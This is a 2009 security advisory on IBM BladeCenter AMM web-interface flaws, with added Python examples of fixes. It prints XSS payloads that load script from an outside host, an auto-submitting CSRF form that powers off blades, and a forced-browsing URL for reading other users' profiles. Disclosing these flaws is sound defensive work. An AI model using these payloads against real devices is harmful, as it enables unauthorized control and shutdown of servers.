ID PACKETSTORM:76505 Type packetstorm Reporter Henri Lindberg Modified 2009-04-09T00:00:00
Description
Louhi Networks Information Security Research
Security Advisory
Advisory: IBM BladeCenter Advanced Management Module
Multiple vulnerabilities
(XSS type 2 & 1, CSRF, Information Disclosure)
Release Date: 2009-04-09
Last Modified: 2009-04-09
Authors: Henri Lindberg [henri.lindberg@louhi.fi], CISA
Device: IBM BladeCenter H AMM
Main application: BPET36H
Released: 03-20-08
Rev: 54
Risk: Low - Moderate
High if Web Access is in active use and
access to login page is unrestricted
Vendor Status: Vendor notified, patch available.
References: http://www.louhinetworks.fi/advisory/ibm_090409.txt
Affected devices (from vendor):
IBM BladeCenter E (1881, 7967, 8677)
IBM BladeCenter H (7989, 8852)
IBM BladeCenter HT (8740, 8750)
IBM BladeCenter S (1948, 8886)
IBM BladeCenter T (8720, 8730)
IBM BladeCenter JS12 (7998)
IBM BladeCenter JS21 (7988, 8844)
IBM BladeCenter JS22 (7998)
IBM BladeCenter HC10 (7996)
IBM BladeCenter HS12 (8014, 1916, 8028)
IBM BladeCenter HS20 (1883, 8843)
IBM BladeCenter HS21 (8853, 1885)
IBM BladeCenter HS21 XM (7995, 1915)
IBM BladeCenter LS20 (8850)
IBM BladeCenter LS21 (7971)
IBM BladeCenter LS41 (7972)
IBM BladeCenter QS21 (0792)
IBM BladeCenter QS22 (0793)
Overview:
Quotes from
http://www-03.ibm.com/systems/bladecenter/hardware/chassis/bladeh/index.html
"In today’s high-demand enterprise environment, organizations
need a reliable infrastructure to run compute-intensive
applications with minimal maintenance and downtime.
IBM BladeCenter H is a powerful platform built with the
enterprise customer in mind, providing industry-leading performance,
innovative architecture and a solid foundation for virtualization."
"Provides easy integration to promote innovation and help manage
growth, complexity and risk"
During a quick overview of BladeCenter AMM web access, it was
discovered that the web administration interface has multiple
vulnerabilities regarding input and request validation.
Details:
Cross Site Scripting
====================
Type 2:
-------
The most serious issue discovered was a persistent XSS
vulnerability on the event log page, resulting from the
display of unsanitized user input received from an invalid
login attempt.
This can be exploited without valid credentials or social
engineering. Access to the device administration IP address is
needed, however, and an administrator has to view the event log
at some point.
A successful attack requires that an administrator visits the
event log page; the injected content is then interpreted by the
administrator's browser, enabling the attacker to control the
chassis and blade configuration.
For example, all blades can be shut down or new administrative
users can be added, depending on the administrator's access rights.
Unsuccessful login attempts are displayed in the event log without
HTML encoding or input sanitation. It is possible to inject
a reference to a remote JavaScript file by using, for example, the
following username:
</script><script src="//l7.fi"></script><script>
Notes:
If user input contains </script>, the dynamic JavaScript is spilled
out on the page, and it is quite easy to mess up the formatting
of the event log page.
Log can be cleared by an authenticated administrator from URL:
http://1.2.3.4/private/clearlog
Event log javascript format:
parent.LogEntryArray[i++] = new LogEntry( "1","2","Audit
","SN#420420313370","09/09/08","04:20:42","Remote login failed
for user '</script><script src='//l7.fi'></script><script>' from
Web at IP 1.2.3.4");
HTML injection can be performed, for example, with the following
"username": <a href="private/clearlog">Mallory</a>
This results in:
<TD>Remote login failed for user '<a href='private/clearlog'>
Mallory</a>' from Web at IP 1.2.3.4</TD>
Entries from the event log are also displayed on the AMM Service
Data page.
Type 1:
-------
The file manager displays user input on the page "as is".
Successful exploitation requires social engineering an
authenticated administrator into visiting the hostile URL.
Example URL:
http://1.2.3.4/private/file_management.ssi?
PATH=/etc"><script%20src="http://l7.fi"></script>
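Both XSS findings above come down to the same defect: untrusted input (a login name, a PATH parameter) is written into a page without encoding for the context it lands in. The following is an added example, not code from the advisory or from IBM's firmware, showing the vulnerable rendering pattern for each of the three contexts the advisory describes (a JavaScript string literal inside a script block, HTML element content, and an HTML attribute value) beside a hardened form. The sample usernames and path are constructed after the advisory's examples; the surrounding markup and the function names are assumptions made for the illustration.

```python
import html
import json

# Constructed sample inputs modelled on the advisory's own examples (not
# captured from a real device): a benign username and the hostile values
# the advisory shows for the event log (Type 2) and file manager (Type 1).
BENIGN_USER = "alice"
SCRIPT_USERNAME = "</script><script src='//l7.fi'></script><script>"
LINK_USERNAME = '<a href="private/clearlog">Mallory</a>'
FILE_PATH = '/etc"><script src="http://l7.fi"></script>'
CLIENT_IP = "1.2.3.4"


def login_failure_message(username, ip):
    """The audit message the advisory shows for a failed web login."""
    return "Remote login failed for user '%s' from Web at IP %s" % (username, ip)


def js_string_literal(text):
    """Encode untrusted text as a JavaScript string literal that is safe to
    embed inside a <script> block.  json.dumps escapes quotes, backslashes and
    control characters; the extra replace turns every '</' into '<\\/' so the
    HTML tokenizer can never see a closing </script> inside the literal.
    JavaScript (and JSON) read '\\/' as '/', so the decoded value is unchanged."""
    return json.dumps(text).replace("</", "<\\/")


def decode_js_string_literal(literal):
    """Inverse of js_string_literal, used to show the round trip is lossless."""
    return json.loads(literal)


def unsafe_js_log_entry(username, ip):
    """Vulnerable pattern from the advisory: the raw message is spliced into a
    JavaScript string literal, so a username containing </script> breaks out."""
    return 'parent.LogEntryArray[i++] = new LogEntry("%s");' % login_failure_message(username, ip)


def safe_js_log_entry(username, ip):
    """Hardened form: the whole message goes through js_string_literal()."""
    return "parent.LogEntryArray[i++] = new LogEntry(%s);" % js_string_literal(
        login_failure_message(username, ip))


def unsafe_html_cell(username, ip):
    """Vulnerable pattern: the raw message lands in element content, so a
    username containing markup becomes live HTML (the <a href> example)."""
    return "<TD>%s</TD>" % login_failure_message(username, ip)


def safe_html_cell(username, ip):
    """Hardened form: HTML-escape the message before it enters element content."""
    return "<TD>%s</TD>" % html.escape(login_failure_message(username, ip), quote=True)


def unsafe_path_input(path):
    """Vulnerable pattern for the file manager's PATH parameter: the value is
    reflected into an attribute, so a double quote in it closes the attribute."""
    return '<input name="PATH" value="%s">' % path


def safe_path_input(path):
    """Hardened form: attribute context needs &, <, >, \" and ' escaped."""
    return '<input name="PATH" value="%s">' % html.escape(path, quote=True)


if __name__ == "__main__":
    for label, unsafe, safe in (
        ("script block", unsafe_js_log_entry, safe_js_log_entry),
        ("table cell", unsafe_html_cell, safe_html_cell),
    ):
        print("[%s] unsafe: %s" % (label, unsafe(SCRIPT_USERNAME, CLIENT_IP)))
        print("[%s] safe:   %s" % (label, safe(SCRIPT_USERNAME, CLIENT_IP)))
    print("[attribute] unsafe:", unsafe_path_input(FILE_PATH))
    print("[attribute] safe:  ", safe_path_input(FILE_PATH))
```

The point of the `</` replacement is that the HTML parser, not the JavaScript engine, decides where a script block ends; plain JSON encoding leaves `</script>` intact and is therefore not sufficient on its own. The same encoded value is also what should be written to the AMM Service Data page, since the advisory notes that it repeats the event log entries.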
Information Disclosure
======================
A read-only operator (for example, a Blade operator with
a scope assignment to one Blade) can view the security
permissions of other users (access roles and scopes) by
forcefully browsing to their respective login profile pages:
http://1.2.3.4/private/login.ssi?WEBINDEX=<n>&JUNK=1
where <n> is the assigned integer value (1..12) of the user
account.
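The profile page above checks only that the caller is logged in, not whether the caller is allowed to see the requested account. The following is an added example, not code from the advisory or from the AMM firmware, of the object-level authorization check that such a page should perform before rendering: an account may read its own profile, and reading any other slot requires a supervisor role. The role names, the user directory and the 1..12 slot range as a constant are assumptions made for the illustration.

```python
from dataclasses import dataclass, field

# Hypothetical role names and a constructed user directory; the advisory
# describes only "administrators" and scoped read-only operators.
SUPERVISOR = "supervisor"
OPERATOR = "operator"
MAX_WEBINDEX = 12  # the advisory gives the account slots as 1..12


@dataclass(frozen=True)
class Account:
    webindex: int                                     # slot used in WEBINDEX=<n>
    name: str
    role: str
    scope: frozenset = field(default_factory=frozenset)  # blade slots managed


DIRECTORY = {
    1: Account(1, "root", SUPERVISOR, frozenset(range(1, 15))),
    2: Account(2, "ops-blade3", OPERATOR, frozenset({3})),
    3: Account(3, "ops-blade7", OPERATOR, frozenset({7})),
}


def can_view_profile(requester, target_index):
    """Object-level authorization for login.ssi?WEBINDEX=<n>: an account may
    read its own profile; reading anyone else's requires the supervisor role.
    Checking that a session exists (the vulnerable behaviour) is not enough."""
    if not 1 <= target_index <= MAX_WEBINDEX:
        return False
    if requester.webindex == target_index:
        return True
    return requester.role == SUPERVISOR


def profile_page(requester, target_index, directory=DIRECTORY):
    """Return the profile data the page may show, or None when denied or empty.
    Denied and empty look the same to the caller, so the response does not
    reveal which slots are in use."""
    if not can_view_profile(requester, target_index):
        return None
    target = directory.get(target_index)
    if target is None:
        return None
    return {"name": target.name, "role": target.role, "scope": sorted(target.scope)}


def visible_profiles(requester, directory=DIRECTORY):
    """Which slots a caller walking WEBINDEX=1..12 actually gets back; used to
    verify that a scoped operator sees only its own entry."""
    return [n for n in range(1, MAX_WEBINDEX + 1) if profile_page(requester, n, directory)]


if __name__ == "__main__":
    for idx, account in DIRECTORY.items():
        print(account.name, "can read slots", visible_profiles(account))
```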
Cross Site Request Forgery
==========================
BladeCenter AMM does not validate the origin of an HTTP request.
If an attacker is able to lure or force an authenticated
administrator to view malicious content, the Advanced Management
Module web administration interface can be controlled by
submitting suitable forms. The attacker is then effectively acting
as an administrator.
A successful attack requires that the attacker knows the management
interface address of the target device.
As the management interface offers a "No session timeout" option,
a user can remain vulnerable to this attack even after closing the tab
containing the management interface, if the cached authentication
is not cleared from the browser.
Proof of Concept:
-----------------
Example form (Powers off Blades 1-4):
<html>
<body onload="document.foobar.submit()">
<form name="foobar" method="post"
action="http://1.2.3.4/private/blade_power_action"
style="display:none">
<input name="COMMAND" value="6.3.2">
<input name="STATE" value="0">
<input name="CHECKED" value="15">
<input name="selall" value="on">
<input name="sel" value="bl1">
<input name="sel" value="bl2">
<input name="sel" value="bl3">
<input name="sel" value="bl4">
<input name="JUNK" value="1">
</form>
</body>
</html>
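The form above succeeds because the AMM accepts any POST that arrives with a valid session cookie. The following is an added example, not code from the advisory or from IBM's firmware, of the two server-side checks that defeat it: the request origin must be the management interface itself, and the form must carry a random token bound to the session, which a page on another origin cannot read. It also applies an idle timeout, since the advisory points out that the "No session timeout" option keeps a forgotten session usable. The management origin, the attacker host name, the token field name and the timeout value are assumptions made for the illustration.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Constructed values: the advisory's placeholder management address is 1.2.3.4;
# the attacker host name is made up for the example.
MANAGEMENT_ORIGIN = "http://1.2.3.4"
DEFAULT_MAX_IDLE = 20 * 60  # seconds; an assumed idle timeout instead of "No session timeout"


class Session:
    """Server-side session record.  The CSRF token is random, stored only here
    and in forms the server itself rendered, so another origin cannot learn it."""

    def __init__(self, user, started_at, max_idle=DEFAULT_MAX_IDLE):
        self.user = user
        self.csrf_token = secrets.token_urlsafe(32)
        self.last_seen = started_at
        self.max_idle = max_idle

    def expired(self, now):
        return now - self.last_seen > self.max_idle


def hidden_token_field(session):
    """What the server embeds in every state-changing form it renders."""
    return '<input type="hidden" name="CSRF_TOKEN" value="%s">' % session.csrf_token


def request_origin(headers):
    """Origin header if present, otherwise the scheme://host of the Referer."""
    if headers.get("Origin"):
        return headers["Origin"]
    if headers.get("Referer"):
        p = urlsplit(headers["Referer"])
        return "%s://%s" % (p.scheme, p.netloc)
    return None


def validate_state_change(session, headers, form, now, allowed_origin=MANAGEMENT_ORIGIN):
    """Decide whether a POST to an action such as blade_power_action may run.
    Returns (accepted, reason).  TLS on its own changes nothing here: the
    browser attaches the session cookie to a cross-site POST over HTTPS too,
    which is why the advisory's timeline notes that SSL does not fix CSRF."""
    if session.expired(now):
        return False, "session idle timeout exceeded"
    origin = request_origin(headers)
    if origin != allowed_origin:
        return False, "request origin %r is not the management interface" % origin
    supplied = form.get("CSRF_TOKEN", "").encode()
    if not hmac.compare_digest(supplied, session.csrf_token.encode()):
        return False, "missing or wrong CSRF token"
    session.last_seen = now
    return True, "ok"


def forged_power_off(session, now):
    """The advisory's auto-submitting form as the server sees it: the victim's
    cookie is present, so the session is valid, but the Origin is the hosting
    page and the attacker has no way to supply this session's token."""
    headers = {"Origin": "http://attacker.invalid", "Cookie": "session=victim"}
    form = {"COMMAND": "6.3.2", "STATE": "0", "CHECKED": "15", "selall": "on"}
    return validate_state_change(session, headers, form, now)


def legitimate_power_off(session, now):
    """The same action submitted from a form the AMM itself rendered."""
    headers = {"Origin": MANAGEMENT_ORIGIN, "Cookie": "session=victim"}
    form = {"COMMAND": "6.3.2", "STATE": "0", "CHECKED": "15", "selall": "on",
            "CSRF_TOKEN": session.csrf_token}
    return validate_state_change(session, headers, form, now)


if __name__ == "__main__":
    s = Session("admin", started_at=0.0)
    print("forged:    ", forged_power_off(s, 60.0))
    print("legitimate:", legitimate_power_off(s, 60.0))
```

Either check alone is weaker than both together: older browsers omit the Origin header and some proxies strip Referer, so an origin-only policy has to decide what to do with a request carrying neither, while a token-only policy still depends on the token never leaking (for instance through the XSS findings earlier in this advisory).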
Summary:
Further research on BladeCenter AMM is strongly encouraged, as
this brief overview touched only the surface of the device.
The management module supports a variety of networking protocols
and also contains features from the Telco version. These can be
found by reading the commented HTML code. One example feature is
http://1.2.3.4/private/get_telco_system_health_summary
It is also apparent that session timeout is not enforced.
More information:
http://www-947.ibm.com/systems/support/supportsite.wss/docdisplay?lndocid=MIGR-5076204&brandind=5000020
http://www-947.ibm.com/systems/support/supportsite.wss/docdisplay?lndocid=MIGR-5076206&brandind=5000020
Mitigation:
* Do not use Web Access for configuring the chassis and blades.
* Limit access to the web administration interface.
* Do not use the "No session timeout" option.
* Always log out and close all browser windows after performing
administrative tasks.
* Do not browse untrusted sites while performing administrative
tasks.
* Only grant web administration access to trusted users.
Disclosure Timeline (highlights from the eight-month effort):
9. September 2008 - Contacted CERT-FI by email
22. October 2008 - Provided IBM with a clarification of
why SSL usage does not fix the CSRF
vulnerability
9. April 2009 - Advisory released
"Replicants are like any other machine. They're either a benefit
or a hazard. If they're a benefit, it's not my problem."
-- Rick Deckard
Copyright 2009 Louhi Networks Oy. All rights reserved. No warranties,
no liabilities, information provided 'as is' for educational purposes.
Reproduction allowed as long as credit is given. Information wants to
be free.
Packet Storm listing: https://packetstormsecurity.com/files/76505/IBM-BladeCenter-Advanced-Management-XSS-XSRF.html (title "IBM BladeCenter Advanced Management XSS/XSRF"; original text at https://packetstormsecurity.com/files/download/76505/ibm_090409.txt)